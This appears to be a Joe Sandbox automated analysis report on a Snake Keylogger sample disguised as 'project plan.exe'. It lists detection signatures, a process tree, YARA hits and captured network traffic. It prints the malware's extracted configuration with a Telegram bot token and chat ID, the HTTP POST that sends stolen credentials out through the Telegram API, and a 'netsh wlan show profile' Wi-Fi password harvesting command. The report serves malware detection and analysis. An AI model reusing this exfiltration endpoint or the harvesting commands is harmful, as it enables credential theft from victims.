Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
project plan.exe

Overview

General Information

Sample name:project plan.exe
Analysis ID:1466687
MD5:ec263cafbd93faeb218574586bf8e45f
SHA1:2d37614bb075a8580fc5fe7851dedbc88911944c
SHA256:7c801923836d6b568d00a338b6bcf41889a7a9150c41a4274c21e50d9eb86f33
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Capture Wi-Fi password
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
One or more processes crash
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • project plan.exe (PID: 1536 cmdline: "C:\Users\user\Desktop\project plan.exe" MD5: EC263CAFBD93FAEB218574586BF8E45F)
    • conhost.exe (PID: 1568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 6132 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • netsh.exe (PID: 3580 cmdline: "netsh" wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • conhost.exe (PID: 3504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 5836 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • WerFault.exe (PID: 4956 cmdline: C:\Windows\system32\WerFault.exe -u -p 1536 -s 1028 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendMessage?chat_id=5361285164"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.3221467298.0000000002D35000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x13d70:$a1: get_encryptedPassword
          • 0x1405c:$a2: get_encryptedUsername
          • 0x13b7c:$a3: get_timePasswordChanged
          • 0x13c77:$a4: get_passwordField
          • 0x13d86:$a5: set_encryptedPassword
          • 0x153af:$a7: get_logins
          • 0x15312:$a10: KeyLoggerEventArgs
          • 0x14f83:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 23 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.project plan.exe.16766a241c0.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.project plan.exe.16766a241c0.3.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              0.2.project plan.exe.16766a241c0.3.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
                0.2.project plan.exe.16766a241c0.3.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x12170:$a1: get_encryptedPassword
                • 0x1245c:$a2: get_encryptedUsername
                • 0x11f7c:$a3: get_timePasswordChanged
                • 0x12077:$a4: get_passwordField
                • 0x12186:$a5: set_encryptedPassword
                • 0x137af:$a7: get_logins
                • 0x13712:$a10: KeyLoggerEventArgs
                • 0x13383:$a11: KeyLoggerEventArgsEventHandler
                0.2.project plan.exe.16766a241c0.3.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x197bc:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x189ee:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x18e21:$a4: \Orbitum\User Data\Default\Login Data
                • 0x19f48:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 33 entries

                Sigma Signatures

                Stealing of Sensitive Information

                barindex
                Sigma detected: Capture Wi-Fi password
                Source: Process startedAuthor: Joe Security: Data: Command: "netsh" wlan show profile, CommandLine: "netsh" wlan show profile, CommandLine|base64offset|contains: V, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 6132, ParentProcessName: RegAsm.exe, ProcessCommandLine: "netsh" wlan show profile, ProcessId: 3580, ProcessName: netsh.exe

                Snort Signatures

                No Snort rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendMessage?chat_id=5361285164"}
                Source: RegAsm.exe.6132.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendMessage"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: project plan.exeJoe Sandbox ML: detected

                Exploits

                barindex
                Yara detected UAC Bypass using CMSTP
                Source: Yara matchFile source: 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTR
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49711 version: TLS 1.2
                Source: project plan.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Windows.Forms.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: mscorlib.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.ni.pdbRSDS source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Drawing.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Windows.Forms.ni.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Drawing.pdbX source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: mscorlib.ni.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Drawing.ni.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Core.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Windows.Forms.pdb; source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Drawing.ni.pdbRSDS source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Core.pdbH source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.ni.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: Binary string: System.Core.ni.pdb source: WERDE5D.tmp.dmp.7.dr
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 00F6A3BFh3_2_00F6A100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 00F6969Fh3_2_00F693E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 00F68848h3_2_00F68430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 00F69AFFh3_2_00F69841
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 00F69F5Fh3_2_00F69CA1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 00F678A9h3_2_00F66DDF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 00F6923Fh3_2_00F68E97
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 00F68109h3_2_00F67E49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_00F66300
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 00F68848h3_2_00F68429
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 00F68848h3_2_00F68776
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_00F66933
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_00F66B14
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06146CE1h3_2_06146A38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06143D19h3_2_06143A70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06147139h3_2_06146E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06144171h3_2_06143EC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06147591h3_2_061472E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 061445C9h3_2_06144320
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 061479E9h3_2_06147740
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06144A21h3_2_06144778
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06147E41h3_2_06147B98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06144E79h3_2_06144BD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06148299h3_2_06147FF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 061452D1h3_2_06145028
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 0614F2D1h3_2_0614F028
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 0614EAF9h3_2_0614E850
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 061486F1h3_2_06148448
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06145729h3_2_06145480
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 0614F729h3_2_0614F480
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06148B49h3_2_061488A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06145B81h3_2_061458D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 0614FB81h3_2_0614F8D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06148FA1h3_2_06148CF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06145FD9h3_2_06145D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 061493F9h3_2_06149150
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06146431h3_2_06146188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06146889h3_2_061465E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_0614CA5F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_0614CA70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_0614CD86
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 061626F9h3_2_06162450
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06160741h3_2_06160498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 061602E9h3_2_06160040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06162FA9h3_2_06162D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06162B51h3_2_061628A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06160B99h3_2_061608F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 061619F2h3_2_06161748
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06163859h3_2_061635B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06163401h3_2_06163158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 061622A1h3_2_06161FF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 06161E49h3_2_06161BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_06169F14

                Networking

                barindex
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE
                Source: global trafficHTTP traffic detected: POST /bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendDocument?chat_id=5361285164&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dc9b102694a6eaHost: api.telegram.orgContent-Length: 534Connection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
                Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: unknownHTTP traffic detected: POST /bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendDocument?chat_id=5361285164&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dc9b102694a6eaHost: api.telegram.orgContent-Length: 534Connection: Keep-Alive
                Source: RegAsm.exe, 00000003.00000002.3221467298.0000000002E57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: RegAsm.exe, 00000003.00000002.3221467298.0000000002D35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: RegAsm.exe, 00000003.00000002.3221467298.0000000002D35000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3221467298.0000000002D29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: RegAsm.exe, 00000003.00000002.3221467298.0000000002C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: project plan.exe, 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: RegAsm.exe, 00000003.00000002.3221467298.0000000002C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
                Source: RegAsm.exe, 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: project plan.exe, 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: RegAsm.exe, 00000003.00000002.3221467298.0000000002E30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6064725165:AAHXOwTVVm0GMC2M_NZjTT0hEHEGMgtU55I/sendDocument?chat_id=5361
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49711 version: TLS 1.2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: Process Memory Space: RegAsm.exe PID: 6132, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: RegAsm.exe PID: 6132, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: C:\Users\user\Desktop\project plan.exeCode function: 0_2_00007FF848F1194D0_2_00007FF848F1194D
                Source: C:\Users\user\Desktop\project plan.exeCode function: 0_2_00007FF848F10B3C0_2_00007FF848F10B3C
                Source: C:\Users\user\Desktop\project plan.exeCode function: 0_2_00007FF848F146200_2_00007FF848F14620
                Source: C:\Users\user\Desktop\project plan.exeCode function: 0_2_00007FF848F196800_2_00007FF848F19680
                Source: C:\Users\user\Desktop\project plan.exeCode function: 0_2_00007FF848F1BD900_2_00007FF848F1BD90
                Source: C:\Users\user\Desktop\project plan.exeCode function: 0_2_00007FF848F105F00_2_00007FF848F105F0
                Source: C:\Users\user\Desktop\project plan.exeCode function: 0_2_00007FF848F24F030_2_00007FF848F24F03
                Source: C:\Users\user\Desktop\project plan.exeCode function: 0_2_00007FF848F11F300_2_00007FF848F11F30
                Source: C:\Users\user\Desktop\project plan.exeCode function: 0_2_00007FF848F24F500_2_00007FF848F24F50
                Source: C:\Users\user\Desktop\project plan.exeCode function: 0_2_00007FF848F10F900_2_00007FF848F10F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00F6C19C3_2_00F6C19C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00F6A1003_2_00F6A100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00F693E03_2_00F693E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00F634F33_2_00F634F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00F688C03_2_00F688C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00F698413_2_00F69841
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00F69CA13_2_00F69CA1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00F66DDF3_2_00F66DDF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00F68E973_2_00F68E97
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00F67E493_2_00F67E49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00F662EF3_2_00F662EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00F663003_2_00F66300
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00F688B03_2_00F688B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00F68F103_2_00F68F10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06146A383_2_06146A38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06143A703_2_06143A70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06146E903_2_06146E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06143EC83_2_06143EC8
